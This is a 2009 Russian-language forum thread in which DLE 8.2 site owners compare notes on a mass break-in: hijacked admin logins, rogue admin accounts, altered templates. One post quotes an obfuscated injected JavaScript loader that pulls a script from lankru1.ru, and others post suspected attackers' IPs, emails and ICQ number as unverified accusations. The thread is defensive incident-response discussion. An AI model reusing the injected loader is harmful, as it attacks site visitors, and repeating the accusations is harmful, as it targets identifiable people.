pagemaster 1 Опубликовано: 12 ноября 2009 Рассказать Опубликовано: 12 ноября 2009 и украинские и российские провайдеры Ссылка на сообщение Поделиться на других сайтах
freeprogs.kiev.ua 0 Опубликовано: 12 ноября 2009 Рассказать Опубликовано: 12 ноября 2009 я 18.08.2009 вписал в backup/.htaccess строку Order Deny,Allow Deny from all как я понимаю это меня спасло и базу никто не спер))) но заметил почти все фалы шаблона изменены в 11.11.2009 в 00:01 посмотрел шаблоны, ничего подозрительного не заметил, никаких внешних ссылок вроде нет Плохо смотришь, наверное. БД не слили, а в шаблон могли внести правки свои и лить трафик... Ссылка на сообщение Поделиться на других сайтах
mobirobi 6 Опубликовано: 12 ноября 2009 Рассказать Опубликовано: 12 ноября 2009 Так же взломали сайт 2-жды за сутки! Даже после патча! Версия 8.2 Это реально? В 8.2 есть еще дыра? Ссылка на сообщение Поделиться на других сайтах
djrogoff_ru 0 Опубликовано: 12 ноября 2009 Рассказать Опубликовано: 12 ноября 2009 Так же взломали сайт 2-жды за сутки! Даже после патча! Версия 8.2 Это реально? В 8.2 есть еще дыра? Скорее всего вставили что-то и лезли после патча через свою дыру Очень внимательно проверяйте логи и сессии на сервере Возможно найдете интересных действий помимо кражи базы,а также вставки пары рекламных скриптов Повторяю,очень внимательно проверяйте логи и сессии на сервере Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 12 ноября 2009 Рассказать Опубликовано: 12 ноября 2009 хех походу сломали и самого celsoft так как взломали сегодня сайты которые стоят на поддомене типа демо=) Скорей всего слили там где хранятся логи активации где есть все ссылки сайтов активации скрипта....так как не могли знать сайт и делали это скорей всего через какой та скрипт даже icq оставили в контактах=) Ссылка на сообщение Поделиться на других сайтах
PaSSoR 19 Опубликовано: 12 ноября 2009 Рассказать Опубликовано: 12 ноября 2009 А чем опасен угод базы? Только тем что мб он в паблик улетит? Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 12 ноября 2009 Рассказать Опубликовано: 12 ноября 2009 Автор хех походу сломали и самого celsoft так как взломали сегодня сайты которые стоят на поддомене типа демо=) Скорей всего слили там где хранятся логи активации где есть все ссылки сайтов активации скрипта....так как не могли знать сайт и делали это скорей всего через какой та скрипт даже icq оставили в контактах=) Активация вне доступа DLE, и чего то прочего, а получить список сайтов можно из любого поисковика. С сайта dle-news.ru ничего никуда и никогда не уходило. Так же взломали сайт 2-жды за сутки! Даже после патча! Версия 8.2 Патч закрывает ошибку, а не гарантирует вам безопасность, если доступ был получен, значит мог быть оставлен бекдор, например в шаблоне, или создан другой админский логин, нужно было проверять сайт на сделанные в нем изменения.А чем опасен угод базы? Только тем что мб он в паблик улетит? Опасен доступ к админпанели, а не БД. Ссылка на сообщение Поделиться на других сайтах
Aleko 1 Опубликовано: 12 ноября 2009 Рассказать Опубликовано: 12 ноября 2009 Злоумышленник изменил админский пароль и создал новый логин с админскими правами и почтовым ящиком sborpochti (гав] gmail.сom Так что в первую очередь проверьте новых админов :-) Ссылка на сообщение Поделиться на других сайтах
dleua 4 Опубликовано: 12 ноября 2009 Рассказать Опубликовано: 12 ноября 2009 (изменено) вот нашел скрипт в main. Что, кто скажет про скрипт? <script language="JavaScript"> var lankru_html = ''; lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" '; lankru_html += 'src="http://l'; lankru_html += 'ankru1.ru/js.php?id=32201'; lankru_html += '&url=' + encodeURIComponent(document.location); lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>'; document.write(lankru_html); </script>Имеется информация о том, что сайт lankru1.ru используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности он был заблокирован. Изменено 12 ноября 2009 пользователем dedywka Ссылка на сообщение Поделиться на других сайтах
Sarvan 35 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 (изменено) Мдя....... Вообще думаю версию движка светить тоже не хорошая идея http://dle-news.ru/engine/skins/images/logos.jpg Изменено 13 ноября 2009 пользователем Sarvan Ссылка на сообщение Поделиться на других сайтах
blaga 39 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 Sarvan смените название этой картинки и тоже самое впишите у себя в файле \engine\skins\default.skin.php тогда не видно будет. Ссылка на сообщение Поделиться на других сайтах
djrogoff_ru 0 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 так же проверяйте полную новость на наличие связки: [url=http://kinowarez.ru][img=http://i34.tinypic.com/magmcl.jpg][/url] Ссылка на сообщение Поделиться на других сайтах
Mek 99 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 Sarvan смените название этой картинки и тоже самое впишите у себя в файле \engine\skins\default.skin.php тогда не видно будет. Я к примеру изменю этот путь с именем файла, потом ещё что нить поменяю для безопасности сайта. А потом выйдет новая версия скрипта и после обновления всё похерится. Неужели нельзя сделать обновление на новые версии без замены всех файлов? Вы же понимаете, что практически в каждом сайте люди вносят изменения непосредственно в файлы движка. Многие такие изменения делаются по ходу работы и запомнить их все просто нереально. Я купил версию 8.2, настроил сайт на денвере, всё сконфигурировал, установил сайт на хостинг. Через 3 недели выходит 8.3, и тут же версия 8.2 становится не актуальной и тормозной ( судя из ЭТОЙ темы). Я скачиваю 8.3, опять же всё настраиваю на локальном компьютере, естественно это занимает некоторое время. ( нет я не тормоз, просто у меня кроме сайта есть ещё работа, личная жизнь и многое другое) Устанавливаю собранный сайт на хостинг. И через месяц опять выходит новая версия DLE. До этого актуальная и и стабильная версия скрипта тут же становится не актуальной и её советуют обновить на новую. И так по кругу. Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 (изменено) За 2009-11-11 у меня в админке DLE были такие IP: 1) 94.143.240.125 За 2009-11-12 у меня в админке DLE были такие IP: 1) 95.135.15.237 2) 193.138.247.180 3) 82.207.50.167 Делали бекапы, запускали антивирус, ну и конечно же каждый тырил шаблон Думаю под этими IP на форуме зарегистрированы пользователи Предлагаю их лишить лицензии, если она у них есть конечно Изменено 13 ноября 2009 пользователем WWW.ZEOS.IN Ссылка на сообщение Поделиться на других сайтах
Gorets 3 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 Пароль можно сменть совершенно любому пользователю сайта и потом зайти с его правами. В основном наверно меняли пароль пользователю с id=1 т.е. админу, а дальше делай с сайтом что хочешь. Действительно дырка ОЧЕНЬ опасная, поэтому предупредите всех своих знакомых, которые могут использовать DLE 8.2, чтобы они в срочном порядке ставили патч. Если же Вы не можете зайти на свой сайт под старым паролем, то на 99% Ваш аккаунт взломан. Дальше надо ставить патч и искать, что злоумышленники могли натворить с сайтом. Например добавить в админы еще одного пользователя, слить бэкап Вашей базы, накидать спам-ссылок в новости и т.д. Желательно проверить логи сервера, чтобы разобраться что-же именно делал злоумышленник на сайте. Еще раз напоминаю, что дырка касается только DLE версии 8.2, так что остальным опасаться не надо. Ссылка на сообщение Поделиться на других сайтах
planetaknig 0 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 (изменено) Уважаемые коллеги по несчастью! Я тут порылся в интернете и нашел программу DLE PASSWORD GRABER! Ставится как доп модуль к dle админеке. Она по сути открывает хеш пароли из таблицы _users из базы dle. Это значит что теперь те, кто слил базы с посетителями могут открыть их пароли не только к сайтам на которых они регились но и их почты. Так как зачастую пароль люди хранят в голове один. А теперь представьте на минуту какие могут быть последствия! Я предлагаю всем кого коснулась беда. 1. Оповестить своих посетителей о том что бы они сменили пароли доступа на свои почтовые адреса. 1. Прошерстить всем свои базы на предмет привязки IP злоумышлеников к своим зарегеным юзерам и попробовать найти email адреса. Если таковы обноружены, отписывайтесь тут. Изменено 13 ноября 2009 пользователем planetaknig Ссылка на сообщение Поделиться на других сайтах
PaSSoR 19 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 Отправил всем знакомым, но уже поздно Ссылка на сообщение Поделиться на других сайтах
Mek 99 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 Причём тут пароль от сайта и пароль от почты ? Если только они одинаковые Ссылка на сообщение Поделиться на других сайтах
PaSSoR 19 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 При том, что на эту почту можно заказать пароль юзера/админа! Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 вот почта googl-man@yandex.ru вот icq 7599484 кто это делал... Ссылка на сообщение Поделиться на других сайтах
PaSSoR 19 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 Вскрыть нечистоты! Узнал на 1 сайте, что под этой ICQ ходит чувак и вскрывает аккаунты, его IP 94.143.240.125. Почта не известна, но ник известен как Freet. Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 вскрывает аккаунты, его IP 94.143.240.125У меня он был еще 2009-11-11 Ссылка на сообщение Поделиться на других сайтах
PaSSoR 19 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 dle-82@yandex.ru И вот эта почта обсуждается..У моего знакомого именно она прописана...! Ссылка на сообщение Поделиться на других сайтах
WMDrakon 20 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 Можно начинать торговлю битами и другими бойцовскими штучками)))) Шучу))) С Петрозаводска он, как я понимаю, да? Ссылка на сообщение Поделиться на других сайтах
globus 0 Опубликовано: 13 ноября 2009 Рассказать Опубликовано: 13 ноября 2009 Реально утром не мог зайти в адмику. Поставил патч, сменил пароль админа. Ни каких последстивий нет. Просто напросто они даже не могли обратится к файлу admin.php . Стоит дополнительная защита Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения